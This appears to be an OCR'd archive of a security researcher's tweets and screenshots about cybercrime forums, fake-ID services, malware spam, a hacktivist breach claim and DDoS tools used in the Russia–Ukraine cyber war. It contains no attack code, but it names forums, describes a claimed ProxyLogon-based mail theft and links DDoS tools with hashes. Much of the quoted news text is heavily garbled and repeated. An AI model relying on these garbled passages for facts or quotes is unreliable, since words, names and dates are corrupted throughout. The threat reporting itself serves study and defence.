— Tactics Techniques and Procedures In-Depth Coverage 
— Malicious and fraudulent infrastructure mapped and exposed 
— Malicious and fraudulent Blackhat SEO coverage 
— Malicious spam and phishing campaigns 
~ Malicious and fraudulent scareware campaigns 
— Malicious and fraudulent money mule recruitment scams 
— Malicious and fraudulent reshipping mule recruitment scams 
— Web based mass attack compromise fraudulent and malicious campaigns 
— Malicious and fraudulent client-side exploits serving campaigns 


20 - Sunday 


04:38 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #cyberattacks 
#CyberAttack #cybersecuritytips #threatreport https://t.co/INHqxJSOsB 
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Need Niche Threat Actor 
Specific STIX/STIX2/TAXII 


Compatible loCs and Threat 
intelligence Feed? 


The World's Premier Threat Actor Specific and loCs and In-House Analytical and Report-Based Driven Provider of the 
Industry's Best Niche STIX/STIX2/TAXII Compatible Threat Intelligence Feed 


04:50 


https://t.co/YSJFV4|jUn #security #cybercrime #malware #cyberattacks 


( PRODUCT DATA SHEET 


#CyberAttack #CyberSec #cybersecuritytips #Threatintelligence #threatreport 


<parent> 
11Wang 
365Exe 
419eater 
4HatDay 
aHack 
Aljyyosh 
Antichat.ru 
ArmadaBoard 
BigF ozzy 
BlackhatWorld 
BPCForum 
Cardvilla 
Chf 
CNHonker 
CNSec 
Crack-Forum 
Cracked.to 
Cyberizm 
Darkmarket.la 


https://t.co/cVLutBGMMW 


Darkmoney 
DarkWeb 
DomenForum 
Eviloctal 
Exelab 
Forum-UINSell 
Forum.Zloy_bz 
ForumSape 
ForumSEO 
Free-hack 
ghostmarket.net 
Gla.vn 
GoFuckBiz 
gofuckbiz.com 
H4kurd.com 
Hack-Port 
Hackersoft 
Hackingboard 
Hackings 
iFud 


iHonker 
LinkFeed 
Linuxac.org 
Master-X 
MasterWebs 
MaulTalk 
Mmpg.ru 
Mr11-11mr.7olm.org 
Nullnoss.org 
pay-per-install_org 
PhreakerPro 
Piratebuhta.pw 
ProCrd 
ProLogic 
Promarket 
ProxyBase 
scamwarners 
SEOCafe 
SEOForum 


ShadowMarket 
SkyFraud 
Spyhackerz 
Svuit.vn 
Szenebox 
Szuwi 
Tenebris 
TheBot 
Toolbabase.se 
TotalBlackhat 
Turkhackteam 
Vsehobby 
Webmasters.ru 
Whitehat.vn 
WW/H-Club 
www.opensc.ws 
Xakep.bg 
Xakepok 
Zismo 
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04:55 


https://t.co/4CqIL2cSeH #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSec #cybersecuritytips #Threatintelligence #threatreport 
https://t.co/M3xVJvX6jE 


U.S Intelligence Community 2.0 


by Dancho Oarchey - Emad dancho darchev@hush com 


Recent Posts 


© inci 


Malicious URL Analysis - 

Sample High-Profile 

Psytrance Song of the Day ~ pate ees Web _ of 
Fraudulent Infrastructure - Bitkit = Silvertine (Talamasca Irgit Polish sae aa 
An Analysis ~ Pan American Remix) - External YouTube apres — is to Malware 
Acquisition Group Money Video - An Analysis ~ An Analysis 
Mule Recruitment Group . = aN + i 
Spotted in the Wild 

>. 
. 


Most viewed posts 


“ THIRD EY 


2) 25 SPIES 


04:59 
https://t.co/JTcqOaYgET https://t.co/gxRzUOm415 
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ujahid Magazine 


; — 


04:59 
https://t.co/JTcqOaYgET https://t.co/6wqWT2hCSI 


423 


ve Won't 


Slow you down. 


For Security that uses 19x more | 
visit McAfee: x booth Deo, memory, 


Nd endpoint 
© J2scribed 
Ss.’ 


: LscCYoSzOl 
os https://t.co/JTcqOaYgET https://t.co/ 
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04:59 


Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 
Views 


150K 
125K 


9.36M 


100K 


Jan 2011 Jan Jan Jan Jan Jan Jan Jan Jan 
2012 2013 2014 2015 2016 2017 2018 2019 


https://t.co/JTcqOaYgET https://t.co/zdKXhzu4ug 
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Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 


The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 
Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


05:00 
https://t.co/JTcqOaYgET https://t.co/5Eel8CCbeT 
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05:00 


https://t.co/JTcqOaYgET https://t.co/qSEUlee8Y0 


427 


05:00 


https://t.co/JTcqOaYgET https://t.co/veul5faUX} 
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EXPOSING KOOBFACE: THE 


05:00 
https://t.co/JTcqOaYgET https://t.co/FdkB8fQhaKk 
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05:00 


105 WCLUDiNG 2 
Seweity72> MARY 
RAUL SES 


Ca 


https://t.co/JTcqOaYgET https://t.co/M6QYN57WvM 


05:03 


https://t.co/JTcqOaYgET https://t.co/VyzwQrdapB 


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 

& 


Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 


05:04 
https://t.co/JTcqOaYgET https://t.co/hfYHt6J3Fz 
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Dancho Danchev Presents! Brace Yourselves! 


—<_, 


Grab today a free copy of the Second Free. 
Exposing Iran's Hacking Scene OSINT-Enaé 

Technica gonestion Empowered and Visualized Report! 
Priced at $500 for an Unlimited Distribution Among Your 


Organization including Individual Researcher Use - This iS 
the Most Comprehensive and Technicall Sophisticated 
Analysis of Iran's Hacking Scene Up-to-Date! 


Commercial Copy Available! A proach me toda} 
proach your manager today! Empower your Threat 
intelligence Team! An OSINT Conducted Today is a 
Tax Payer's Dollar Saved Tomorrow! 
https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 
Copy Available! 


05:05 
https://t.co/JIcqOaYgET https://t.co/sHZpU77j55 
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05:05 


05:06 


Cybercrime service automates creation of 
fake scanned IDs, other verification docs 


The service produces high-quality fake scans that can be used in fraud attacks to impersonate 


victims, Group-IB researchers said 


oe ooO0e090 


By Lucian Constantin 
Nomarss Correspondent, CGO 


Anew Web-based service for cybercriminals automates the creation of fake 
scanned documents thal can help fraudsters bypass the kientty verification 
processes used by some banks, e-commerce businesses and other onkine 
services providers, according to researchers from Russian cybercrime 
investigations firm Group-1B. 


The service can generate scanned copies of passports, ID cards and driver's 
icenses from ditlerent couritries for Kientibes supphed by the service users, fake 
scanned utility bills from various companies, as well as take scanned copies of 
banking stalements and credit cards issued by a large number of banks, saki 
Andrey Komnarov, head of international projects at Group-|B, via emai. 


lis common practice for banks, payment and money transter providers, onine 
gambling sites and other types of businesses thal engage in money transactons 
via the Intemet to ask their customers for scanned copies of documents in order 
to peove their identities or verify their physical addresses, especially when their 
anti-fraud departments detect suspicious accourn activity 


[ Retated: 4 places to tind cybersecurity talent in your own organization J 


https://t.co/JTcqOaYgET https://t.co/GmJNPUTIjM 


SC Macka US > Newt > Mace webelte hacking tool alerts to dangers of Googie dorks 


by Actam Greenberg. Senior Reporter 
LW ftom oerargscon ] 


Nowember 05, 2012 


Mass website hacking tool alerts to dangers of Google 


dorks 
eooeococo 


Google deeks are not peeks who love the imernet- related services and products provider. Google dorks are akin to 
super-specific searches, which attackers have been known to take advantage of in attempts to expose vulnerable 


websites, 


Cyber crime researcher Dancho Danchev recently blogged about a mass. do-R-yourself (DIY) website-hacking tool 


making the rounds that takes acwarvtage of those Google dorks. 


“The proxy supporting tool has been purposely designed to allow automatic mass websites recannuissance for the 
Ppurpese of launching SQL injection attacks against those websites that are vulnerable” Danchev wrote. 


SQL stands fer structured query language and is programrening terminalogy designed for managing data. SQL. 
infection typkally involves an attacker inputting SQL statements into an entry held that will force the system to 


execute patentially malicious commands. 


“Once a compromise takes pice, the attacker is in a perfect position to inject malicious scripts on the atected 
sites, poterviially exposing their users to malicious client-side exploits serving attacks.” according to Danchev. 


Danchey wrote that an escalating number of DIY tools circulating the internet may open the door for novice 
attackers, but Banry Stteiman, director of security strategy wath Imperva, told SCMagazine.com on Tuesday that & is 


the Google dorks that should be raising alarms, 


https://t.co/JTcqOaYgET https://t.co/eCoeQLpk9A 
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PCWorld 


rome Wrveee 


Fake CNN Alert Still Spreading Malware 
@oeeago009o 


By Gregg Kore 


ween 


The massive attack that has infected PCs by trcking wsers into chcking Inks 


in take messages fron CNN Com Shows Ite sep of ending B00, security 
revewchers say tase Wren DAer Sorvam Urowe 


wont unt hes 


According to MX Logic Ine. , spare posing as CNN.com Top 10 lets peaked at aceasta cilia case 


ote t ft! million messages per hour early Thursday, but remained at high 10 Ouch Pees tr he Borst Seowty 
volumes Proughout the day Friday. The Colorado security verter said t had Nperen 
been tacking an average of 8 milion messages per hour snnce mucraght vee 

Why Vou Low! Ying Mircea 1) 
MX Loge’s vice present of miormation tecurty, a> Vote o , called Re Proaat any 
trend “a very slow, but steady decline” trom the 11 am. Mountain Time peak 
the day betore 


| Fre cpading bow the rae me of anevins sommne wil grommet you PC 


Mapelio aio tad Dat he span has Changed since attacas were frst 
launched on Tuesday “We've also seen several morphs of Tvs span over the 
past couple of days.” he sad in an entry posted on He UK Loge biog Fretay 
Where the messages once tunpeted * Ch! com Daily Top 10° in De 
Opt Mean and bred % a begie Mename On maleate hosing Stet "Om 
the spam sports a sutyect reading “CNN Alerts: My Custom Alert” and uses a 
variety of Merames in he makoous URL 


“This is Uhely in response to all of he media atlertien ard awareness Put has 
been brought up over the past couple of days." Masiello speculated 


Also on Friday, Websense inc reported that ts researchers had seen the 
attack mutating. with the spam subject heading not only touting “CNN Alerts. 
My Cuntiom Alec“ but alto using legitimate news stones culled trom CNN to 
make the mestages more comminang 

Users eho chched on the FULL STORY irk in he message mere redirected 
to a take CNN 60. where ey were told they needed to download an upcate: 
to Flash Player, Acobe System ine °S popatar Internet mecha player. to view a 
video clip from CNN. 


Websense also sand @ had spetied traces of the carmpagn in biog sparn. 


Merete 

WhUl's Feet fr Cowd and COQ Eve lecrrotngees 
ee tee en 
Neri 8 Eeatiaws ne Os ner Se ern why 


tf users agreed to download the bogus Flash update. they were trapped in an 
endiess loop, where clicking “Cancer” in the inital dislog produced a second 
popup. Clicking “Cancer” there returned the user to the frst pop-up. The only 
options at that point were for users to shat Gown the browser of give in and 
instal the matware 


MX Loge added that ¢ had seen De URLs im De spam lead to lngtenate 
Gomanns that had probably been compromesed. and narend a UK based 
renting company as an example 


Earker thes weet. Busnaran securty sesearcher Dancho Danchey Mad found 


05:06 
https://t.co/JTcqOaYgET https://t.co/kiY4bEiEli 
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MEWS 


Cybercrime service automates creation of 
fake scanned IDs, other verification docs 


The service produces high-quality take scans that can be used in fraud atiacks to impersonate 
ms, Group-IB researchers said 


vk 


0@0000090 


Acew Web Cased tervce tor Cydercrrnnals atomates fe creation of tae 
scanned docurrents tut can help tauditers bypass the centty verticaton 
PrO”eRLes Uned by Bome Darks e-commerce bupmesses and otter orine 
Bervices providers, according to researchers trom Runsan cybercrene 


nvevigations tm Group B 


The service Can generate scanned copes of passports. ID cards and drivers 
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This guide is for educational purposes only I do not take any responsibility about anything 

happen after reading the guide. I'm only telling you how to do this mot to do it. It's your decision. 
If you want to put this text on your Site/FTP/Newsgroup or anything else you can do it but don't 
change anything without the permission of the author.I"ll be happy to see this text on other pages too. 


All copyrights reserved.You may destribute this text as long as it's not changed. 
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Author Notes: 


I hope you like my texts and find them useful. 

If you have any problem or some suggestion feel free to e-mail me but please don"t send mails like 
“I want to hack the US government please help me” or “Tell me how to blind a trojan into a .jpg” 
“Were can I get a portscanner™ etc...... 

Be sure if I con help you with something I will do it. 

I've started writing security related tutorials and I hope you like that.I‘ll try to cover 

much more topics in my future texts and I want to thank to all of the people that like ay 

texts. 
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Dancho Danchev @dancho_.. - 11 Nov 20 

9) New Post - "Exposing Protonmail and 
Tutanota's Illicit Abuse by Ransomware 
Gangs - A Compilation of Currently Active 
Ransomware-Themed Email Addresses" - 
is.gd/NPLLg5 CC: @ProtonMail 
@TutanotaTeam #security #cybercrime 
#malware #Threatintelligence 


0 3 im QO 2 = 


ProtonMail @ 
aa §=@ProtonMail 


Replying to @dancho_danchev and @TutanotaTeam 
Thanks for the report, we have 

zero tolerance for abuse and 

we'll investigate this and take the 
appropriate actions. 

17:52 - 11 Nov 20 - Twitter Web App 
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Cybercrime service automates creation of 
fake scanned IDs, other verification docs 


The service produces high-quality fake scans that can be used in fraud attacks to impersonate 
victims, Group-|IB researchers said 


©OO00000 


By 
femaren Comeupondent, CSO 


Anew Web-based service for cybercriminals automates the creation of fake 
scanned documents that can help fraudsters bypass the kientty venfication 
processes used by some banks, e-commerce businesses ard other onkine 
services providers, according to researchers from Russian cybercrime 
irwestigations firm Group-IB 


The service can generate scanned copies of passports, ID cards and driver's 
icenses from different countries for Kientites supphed by the service users, fake 
scanned ulility bills from various companies, as well as take scanned copies of 
banking stalements and credit cards issued by a large number of banks, said 
Andrey Komnarov, head of intemational projects at Group-IB, via emai. 


lis common practice for banks, payment and money transter providers, onine 
gambling sites and other types of businesses thal engage in money fransactons 
via the Intemet to ask their customers for scanned copies of documents in order 
to prove their dentities or verify their physical addresses, especially when their 
ant-traud departments detect suspicious accourtt activity. 
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Noweriber 0G, 2019 


Mass website hacking tool alerts to dangers of Google 
dorks 


0000000 


Goagle dorks are nat peeks who love the iternet-related services and products provider. Google dorks are akin to 
super-specific searches, which attackers have been known to take advantage of in attempts to expose vulnerable 
websites, 


Cyber crime researcher Dancho Danchev recently blogped about a mass. do-R-yourself (DIY) website-hacking tool 
making the rounds that takes adwarvtage of those Google dorks. 


“The proxy supporting tool has been purposely designed to allow automatic mass websites recanruissance for the 
purpose of launching SQL infection attacks against those websites that are vulnerable” Danchev wrote. 


SQL stands for structured query language and is programening terminology designed for managing data. SQL 
Injection typkally involves an attacker inputting SQL statements into an entry held that will force the system to 
execute potentially malkious commands. 


“Once a compromise takes place, the attacker is in a perfect position to inject malicious scripts on the affected 
sites, potentially exposing their users to malicious client-side exploits serving attacks.” according to Danchev. 


Danchey wrote that an escalating number of DIY tools crculating the internet may apen the door for nove 
Mtachers, but Barry Stiteiman director of security strategy wah Imperva, told SCMagazine.com on Tuesday that & is 
the Google dorks that should be raising alarms. 


fe al 
https://t.co/JTcqOaYgET https://t.co/BxoLFMEvU5 


475 


PCWorld 


rome Wrveee 


Fake CNN Alert Still Spreading Malware 
@oeeago009o 


By Gregg Kore 


ween 


The massive attack that has infected PCs by trcking wsers into chcking Inks 


in take messages fron CNN Com Shows Ite sep of ending B00, security 
revewchers say tase Wren DAer Sorvam Urowe 


wont unt hes 


According to MX Logic Ine. , spare posing as CNN.com Top 10 lets peaked at aceasta cilia case 


ote t ft! million messages per hour early Thursday, but remained at high 10 Ouch Pees tr he Borst Seowty 
volumes Proughout the day Friday. The Colorado security verter said t had Nperen 
been tacking an average of 8 milion messages per hour snnce mucraght vee 

Why Vou Low! Ying Mircea 1) 
MX Loge’s vice present of miormation tecurty, a> Vote o , called Re Proaat any 
trend “a very slow, but steady decline” trom the 11 am. Mountain Time peak 
the day betore 


| Fre cpading bow the rae me of anevins sommne wil grommet you PC 


Mapelio aio tad Dat he span has Changed since attacas were frst 
launched on Tuesday “We've also seen several morphs of Tvs span over the 
past couple of days.” he sad in an entry posted on He UK Loge biog Fretay 
Where the messages once tunpeted * Ch! com Daily Top 10° in De 
Opt Mean and bred % a begie Mename On maleate hosing Stet "Om 
the spam sports a sutyect reading “CNN Alerts: My Custom Alert” and uses a 
variety of Merames in he makoous URL 


“This is Uhely in response to all of he media atlertien ard awareness Put has 
been brought up over the past couple of days." Masiello speculated 


Also on Friday, Websense inc reported that ts researchers had seen the 
attack mutating. with the spam subject heading not only touting “CNN Alerts. 
My Cuntiom Alec“ but alto using legitimate news stones culled trom CNN to 
make the mestages more comminang 

Users eho chched on the FULL STORY irk in he message mere redirected 
to a take CNN 60. where ey were told they needed to download an upcate: 
to Flash Player, Acobe System ine °S popatar Internet mecha player. to view a 
video clip from CNN. 


Websense also sand @ had spetied traces of the carmpagn in biog sparn. 


Merete 

WhUl's Feet fr Cowd and COQ Eve lecrrotngees 
ee tee en 
Neri 8 Eeatiaws ne Os ner Se ern why 


tf users agreed to download the bogus Flash update. they were trapped in an 
endiess loop, where clicking “Cancer” in the inital dislog produced a second 
popup. Clicking “Cancer” there returned the user to the frst pop-up. The only 
options at that point were for users to shat Gown the browser of give in and 
instal the matware 


MX Loge added that ¢ had seen De URLs im De spam lead to lngtenate 
Gomanns that had probably been compromesed. and narend a UK based 
renting company as an example 


Earker thes weet. Busnaran securty sesearcher Dancho Danchey Mad found 


13:32 
https://t.co/JTcqOaYgET https://t.co/9tVL6hCanu 
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MEWS 


Cybercrime service automates creation of 
fake scanned IDs, other verification docs 


The service produces high-quality take scans that can be used in fraud atiacks to impersonate 
ms, Group-IB researchers said 


vk 


0@0000090 


Acew Web Cased tervce tor Cydercrrnnals atomates fe creation of tae 
scanned docurrents tut can help tauditers bypass the centty verticaton 
PrO”eRLes Uned by Bome Darks e-commerce bupmesses and otter orine 
Bervices providers, according to researchers trom Runsan cybercrene 


nvevigations tm Group B 


The service Can generate scanned copes of passports. ID cards and drivers 
hoenses from Giterent countries toy ddentites suppied by he service users. take 
Scanned ality bils oem various Comparses. at wel as take scanned copes of 
barking stmements and credit Cards issued by a linge number of barks sand 


Andrey Kornaroy. head of reematonal prowcts at Group 1B. va enad 


Ria common practce for barks, payment and money taraler providers, oniie 


Garbiing ates and other types of busmesses Pl engage n money tarsactora 
Wa the Intiornet to ach ther cuttomners for scanned copes of docurnents in order 
to prove thew terttes or verty ther physical addresses, expecally mhen ther 


an® baad Gopartnents Getect sunpicious account act 


ty 


[Rotated 4 pisces to find cybersecurity talent in your own organization 


Using mage manpuato 


soPeare ange Tre photo manne and ther detants 
on a scanned ID 6 cbwouty not a new practce Dut services lke the one 


erties by Group IB Put automate he whole process and produce Mgt quality 


results are new on the cybercrmnal market, Komarew sad 


According to Group iB. the sence = prowdied Brough a mebste hosted on a 
server mn Germany The domun numne mas regaitered in May, bul the service 


went aurched 1 md Aug 


Komaroe td 


Incependient cybercnme researcher Dancho Oanchev described a very sentar 


pervice in a July biog post: howewer, Komarov coukd not confiern whether @ is the 
Barre one because there mas no reference to the service's domain mare mn 


Danchev's report 


The sernce found by Group IB has leenpiates tor passports. (D cards and 
@iver's loences fer De U.S Canada, Russia, He UK. Germany, Re 
Nethertands and otter Evropean Urvon countnes & also Mas ternptates tor bark 


fernents. credit cards ~ thont and back — and utility bills tom Banks and utility 


COMpENEL COENEN 1 Pote counties 


The ternpiates are for docurnents and cards Dut show ages of use and are 
scanned at dflerert anges and dferert postors on the canvas Ths makes 
the resiting rnage appear more actheric 


ad 
a 


13:33 
https://t.co/JTIcqOaYgET https://t.co/dRJMVTO6GL 
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Popular Tags: 
Hacker Group Cybercrime Forum Cybercrime Forum Community 
Cybercrime Community Cybercrime Forum Data Set 
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nome cto 810 


“We make Cyber Intelligenc 


impact where no one has 
been before!" 


Our Services 


Technical Collection “ oO 


23 - Wednesday 


17:44 


| just interviewed @michael_deebo - Go through the interview here - 
https://t.co/woirrT4y4V - who else do you think | should interview? Stay tuned for 
more upcoming interviews! Cheers and thanks Mike! #Threatintel 
#Threatintelligence 
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26 - Saturday 


01:23 


RT @CHEN PR: Great interview with @Intel471Inc’s @michael_deebo on the current 
state of the #cybercrime ecosystem &amp; the latest trends, tact... 


13:58 


https://t.co/NzsTDI4WA5 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #CyberAttack #CyberSec #Threatintel #ThreatHunting 
#Threatintelligence #STIX #STIX2 #TAXII https://t.co/ka9yfciTte 


18:36 


https://t.co/tvPw6esTeM #security #cybercrime #malware #cyberattacks 
#CyberAttack #Cyberwar #CyberSecurity #Threatintelligence #Threatintel 
#ThreatHunting https://t.co/Qnb6éYtvVNO 
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https://t.co/tvPw6esTeM #StopRussia #StopWar #StopTheWar 
#StopRussianAggression #RussianArmy #RussiaUkraineWar #RussiaUkraineConflict 
#russianinvasion #RussiaUkraine #RussialnvadedUkraine #UkraineUnderAttack 
#UkraineWar #UkraineRussia #Ukrainelnvasion https://t.co/uUYHGvWgPBB 


480 


B Disbalancer 0.7.2-main = 


Client ID: 


Stats: Packets sent 
Tvesds 
Byes sent TT ve 


Tasks 


EDi os Eom Eenreerere™ 


20:39 


"The Cyber War Between Russia and Ukraine - An OSINT Analysis" - 
https://t.co/tvPw6esTeM #security #cybercrime #malware #CyberAttack #CyberSec 
#CybersecurityNews https://t.co/KGissNYJOS 
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20:40 


"The Cyber War Between Russia and Ukraine - An OSINT Analysis" - 
https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraine #RussialnvadedUkraine 
#RussiaUkraineCrisis #RussialnvadesUkraine #UkraineWar #UkraineRussia 
#UkraineRussiaConflict #UkraineRussiaCrisis https://t.co/IFamRoOHpz 
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20:46 


"Exposing Anonymous International’s Hacking Collective Online Infrastructure - An 
OSINT Analysis" - https://t.co/oXIGJXhwC3 #security #cybercrime #malware 
#CyberAttack #CyberSec #CybersecurityNews https://t.co/Y9QChYcfGX 
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"Exposing Anonymous International’s Hacking Collective Online Infrastructure - An 
OSINT Analysis" - https://t.co/oXIG]XhwC3 #RussianArmy #RussiaUkraine 
#RussialnvadedUkraine #RussiaUkraineCrisis #RussialnvadesUkraine #UkraineWar 
#UkraineRussia https://t.co/zTBYUvc3P] 
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20:50 


"The Cyber War Between Russia and Ukraine - An OSINT Analysis" - 
https://t.co/tvPw6esTeM #OSINTUkraine https://t.co/QWIg43yp4N 
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B Disbalancer 0.7.2-main = 
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EDa > Sore lanrRerer a” 


"Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses - Part Four" - 
https://t.co/gkCKZbUKTA #Ransomware https://t.co/Xg600ZnHbL 
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"The Cyber War Between Russia and Ukraine - An OSINT Analysis" - 
https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #RussiaUkraineConflict 
#russianinvasion #RussiaUkraine #RussiaReport #UkraineRussiaWar 
#UkraineUnderAttack #UkraineWar #UkraineRussia https://t.co/qgFVDu3vaqT 
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23:48 


"The Current State of the Cyber War Between Russia and Ukraine — An OSINT 
Analysis" - https://t.co/aoQbXzDwXM #RussianArmy #RussiaUkraineWar 
#RussiaUkraineConflict #russianinvasion #RussiaUkraine #RussialnvadedUkraine 
#UkraineRussiaWar #UkraineUnderAttack https://t.co/EnblvBpZcl 
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https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussialnvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/wRYldniLj4 


489 


ANONYMOUS LIBERLAND 
AND THE PWN-BAR HACK TEAM 


About us 

Greetings citizens of the world. Let us introduce ourselves... We are the Pwn-Bar international 
hack team. We stand for equal opportunity pwnage and unrestrictec ss to information 

Our Russian APT friends seem kinda out of shape, don't they? Defacements? DDoS attacks? What 
year is this? 2012? 

We thought maybe they needed a little reminder of what real hacking is like, so we logged off 
Twitter to touch Shodan and we were xcked with what we saw. TI have the st secure cybers 
in entire world and we could not hack them. 

Hahaha, Just kidding... 

We announce the start of OpCyberBullyPutin. We are going to show you how prepared for cyberwar 
Russia and CIS countries fy are. 


We are Anonymous. We are a legion. We do not forgive. We do not forget. Expect us. 
News 


The Unitary Enterprise "Tetraedr" 

Country: Belarus, Category: Military-industrial complex 

The TETRAEOR UE is a scientific and industrial private unitary enterprise specializing in 
development and manufacture of advanced radio-electronic weapon system development and 
manufacture of hardware and software used in radar and radio electronic control asse 

upgrading of Air Defense Mi e Systems. 

The TETRAEDR VUE was founded on 26 April 26 state registration No 1962 The TETRAEDR UE 
is a full member of the Belarusian Chamber of Commerce and Industry. 

The TETRAEOR UE does not patch ProxyLogon in year 2022. The PWNBAR HT hacked them and copied 
their mailspools 

If you saw pictures from Russian state TV of missiles being fired at military training in 
Belarus, included are the schematics for some of those SAMS, and email threads that might be of 
interest to researchers of Belarusian involvement in the international arms trade. 


00:37 


https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussialnvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/imhvaFoLDG 
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@ eng.mil.ru 


rs 


This page isn't working 
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https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussialnvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/inhFC3A3K0 
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G Australia, Perth o/4 Traceroute 95.72.229.228 


= Austria, Salzburg o/4 Traceroute 98.72.229.228 
bl Canada, Toronto o/4 Traceroute 95.72.229.228 
Li France, Paris o/4 Traceroute 9S.72.229.228 
= Germany, Frankfurt o/s4 Traceroute 95.72.229.228 
Il Hong Kong, Hong Kong o/4 Traceroute 95.72.229.228 
= Iran, Tehran o/4 Traceroute 95.72.229.228 
LE Italy, Milan o/4 Traceroute 95.72.229.228 
(i Kazakhstan, Karaganda o/4 Traceroute 95.72.229.228 
i Lithuania, Virwus o/4 Traceroute 95.72.229,228 
IM Moldova, Chisinau o/4 Traceroute 95.72.229.228 
t= Netherlands, Amsterdam o/4 Traceroute 95.72.229.228 
GM Portugal, Viana o/4 Traceroute 95.72.229.228 
jm Russia, Moscow o/4 Traceroute 95.72.229.228 
a Russia, Moscow o/4 Traceroute 95.72.229.228 
Cl Switzertand, Zunch o/4 Traceroute 95.72.229.228 
Gi Turkey, Istanbul o/4 Traceroute 95.72.229.228 
@ Ukraine, Khmelnytskyt o/4 Traceroute 95.72.229.228 
f@ Ukraine, Kyiv o/4 Traceroute 95.72.229.228 
MMi USA, Los Angeles o/4 Traceroute 95.72.229.228 
Ml USA, New Jersey o/4 Traceroute 98.72.229.228 
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https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussialnvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/CoOVoVYHGS 
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https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussialnvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/jJM4BnTfwji 


DISBALANGER 


New Generation of 
WEBS3 Security 


For Business 


Stress Testing Token Launch DDoS Consulting 
Protection 
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https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 
#RussiaUkraine #RussialnvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 
#UkraineWar #UkraineConflict https://t.co/iHjaxXRQ4tj 
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00:38 


https://t.co/tvPw6esTeM #RussianArmy #RussiaUkraineWar #russianinvasion 


IT ARMY of Ukraine 
Let's shut down more news YouTube channels that openly lie about the war in Ukraine. 


YouTube channels: 

First channel: https:/ 

Russia 24: https://v 

TASS: https://wv 9) »m/c/TASSagenc 

RIA Novosti utube.com/user/rianovosti 


https://www.youtube.com/channel/UC8NI7TQLC6ex8MTRCuAW3SA 
https://www.youtube.com/channel/UCGRcod_jR4sCS9XUMLCv4GJQ 
https://www.youtube.com/channel/UCSqO8IV-ric 

https://v joutube.com/c 

httpos://www.youtube.com/channel 

https://www.youtube.com/ch /UCS >cjl-e-lams_g 
https://www.youtube.com/ch | vYDYmmZDbeDy5N_aBxXjpA 


https://www.youtube.com/ch WUC} IV_Gyp1YOWJwSNa0wRw 


https:// outub Wich C8ICS8Ubv3t0-Tf4lYLiolA 


YouTube-blogers: 
ZIMA LIVE: https://\ 
Conospés LIVE: https 


How to report channels: 

- Turn on your laptop or desktop computer. 

- Turn on VPN as most channels are not available in Ukraine. 

- Sign in to your YouTube account. 

- Open the desired channel. 

- Go to the About tab. 

- Find the flag image and click on it. 

- Select the appropriate violation description from the drop-down menu. 


20 


#RussiaUkraine #RussialnvadedUkraine #UkraineRussiaWar #UkraineUnderAttack 


#UkraineWar #UkraineConflict https://t.co/pCVkphTnCg 
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Russia MUST BE STOPPED! Help Ukraine WIN! 


Preckas eepeue 


Eegie version 


Coffees emnee. en 108 PD mane mpnad amine tee Neg es Nene ee om popenenee, 


Nember of Levees 


00:49 


Big stuff. #Ukraine is currently crowd-sourcing #DDoS (Distributed Denial of Service) 
attacks against #Russia using a publicly accessible DDoS Tool called TheDisbalancer 
MD5: 9805b0891351cd760012ce02d738dc63 Detection rate here - 
https://t.co/53PCHAI299 https://t.co/3AwtLeiOps 
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Another #DDOoS attack tool in circulation in the #Russia and #Ukraine cyber war. 
MD5: f67f5d78f263ddf92749f09d3d478e4e VT: https://t.co/tE6uaEPtzr MD5: 
db8fdd09ed4a350cf509a241b76f46c1 https://t.co/KajflPgaSr hosted on @github - 
https://t.co/UxjPuD8S4K 


ei 
01:12 


Awesome! A flood of #DDoS attack tools hosted on @github in the #Russia and 
#Ukraine cyber war. https://t.co/fg6sQUaRzK; https://t.co/UxjPUD8S4K; 
https://t.co/jXpMsUmé8sgtsS; https://t.co/OUssOGUw1v; https://t.co/T32Ng8fsjG; 
https://t.co/dBNCllzZJy 
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01:14 


Second batch of #DDoS attack tools hosted on @github in the #Russia and #Ukraine 
cyber war. https://t.co/ulQfvOUveV; https://t.co/dqB3glACli; https://t.co/Ei5qy230e2; 
https://t.co/OsOzwz9U2Q MD5: e346073eb932a3effff365ddb8070ac7 
https://t.co/sGsSYQUB65K 


09:00 


https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #ThreatIintelligence 
https://t.co/GZzpFQMpTG5 
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https://t.co/OmUajr8DT8 #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSecurity #CyberSec #Threatintel #Threatintelligence 
https://t.co/WGv73ns8ng 


report - -78867bSd-6c3e-5273-8298-27b4d0f8cb78 


DANCHO DANCHEV 


% 
